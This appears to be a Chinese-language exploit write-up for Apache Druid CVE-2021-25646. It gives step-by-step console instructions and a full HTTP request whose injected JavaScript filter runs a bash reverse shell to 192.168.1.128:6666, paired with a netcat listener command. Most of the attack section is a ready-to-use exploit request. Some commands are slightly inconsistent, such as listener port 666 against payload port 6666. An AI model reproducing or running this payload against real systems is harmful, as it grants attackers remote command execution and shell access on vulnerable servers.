Skip to content

Latest commit

 

History

History
95 lines (62 loc) · 13.5 KB

druid 远程命令执行 (CVE-2021-25646).md

File metadata and controls

95 lines (62 loc) · 13.5 KB
Raw

druid 远程命令执行 (CVE-2021-25646)

描述: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。

影响版本

Apache Druid < 0.20.1

直接拿nussus扫

打开网站

http://192.168.1.192:15048/unified-console.html

image-20211117183901796

控制台

http://192.168.1.192:62277/index.html#/

image-20211117183113530

打开网站http://192.168.1.192:15048/unified-console.html

点击左上方Load data -> Local disk:

右侧表单填入:

Base directory: quickstart/tutorial/

File filter: wikiticker-2015-09-12-sampled.json.gz

依次点击

image-20211117184322983

然后一直点击next知道下一步是fiter时抓包

此时替换数据包中POST的data数据,原始数据:

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[]}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

替换后的数据:

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('bash -i >& /dev/tcp/192.168.1.128/6666 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

其中,执行命令的代码为:

"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.1.128/6666 0>&1')}"

nc -lvvp 666 即可

exp

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.1.192:15048
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 10259
Origin: http://192.168.1.192:15048
Connection: close
Referer: http://192.168.1.192:15048/unified-console.html
Cookie: SESS12ca17b49af2289436f303e0166030a2=IbnbPIOtDzvyq8wYXho7mUGfyoawhdgPvMVszZDBfCI

{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"time\":\"2015-09-12T00:46:58.771Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"added project\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Oswald Tilghman\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"GELongstreet\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:00.496Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"Robot inserta {{Commonscat}} que enllaça amb [[commons:category:Rallicula]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Rallicula\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"PereBot\",\"delta\":17,\"added\":17,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:05.474Z\",\"channel\":\"#en.wikipedia\",\"cityName\":\"Auburn\",\"comment\":\"/* Status of peremptory norms under international law */ fixed spelling of 'Wimbledon'\",\"countryIsoCode\":\"AU\",\"countryName\":\"Australia\",\"isAnonymous\":true,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Peremptory norm\",\"regionIsoCode\":\"NSW\",\"regionName\":\"New South Wales\",\"user\":\"60.225.66.142\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:08.770Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea abruzzorum\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:11.862Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus flammigerus\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:13.987Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama mossambica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:17.009Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"/* Imperi Austrohongarès */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Campanya dels Balcans (1914-1918)\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Jaumellecha\",\"delta\":-20,\"added\":0,\"deleted\":20}\n{\"time\":\"2015-09-12T00:47:19.591Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"adding comment on notability and possible COI\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":true,\"isRobot\":false,\"isUnpatrolled\":true,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Dani Ploeger\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"New Media Theorist\",\"delta\":345,\"added\":345,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:21.578Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Copying assessment table to wiki\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:WP 1.0 bot/Tables/Project/Pubs\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"WP 1.0 bot\",\"delta\":121,\"added\":121,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:25.821Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama persimilis\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:29.913Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Blank stale warning(s) and replace with {{[[template:OW|OW]]}} using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User talk\",\"page\":\"User talk:161.184.95.17\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"DavidLeighEllis\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:33.004Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus edioi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:35.776Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agave gentryi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"TuHan-Bot\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:37.881Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama sankaranica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:42.090Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea albertae\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:44.963Z\",\"channel\":\"#ru.wikipedia\",\"cityName\":null,\"comment\":\"/* Донецкая Народная Республика */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Караман, Александр Акимович\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Камарад Че\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:47.870Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus duboisi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:50.819Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"/* Films */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Keiynan Lonsdale\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Lg16spears\",\"delta\":-11,\"added\":0,\"deleted\":11}\n{\"time\":\"2015-09-12T00:47:53.259Z\",\"channel\":\"#ja.wikipedia\",\"cityName\":null,\"comment\":\"/* 対戦通算成績と得失点 */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"アルビレックス新潟の年度別成績一覧\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"BlueMoon2662\",\"delta\":14,\"added\":14,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:56.126Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Bot updating unblock request table ([[en:WP:PEACHY|Peachy 2.0 (alpha 8)]])\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:Cyberbot I/Requests for unblock report\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cyberbot I\",\"delta\":-74,\"added\":0,\"deleted\":74}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
					"function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -i > /dev/tcp/192.168.1.128/6666 0<& 2>&1')}",
					"dimension": "added",
					"": {
						"enabled": "true"
					}
				}
			}
		},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}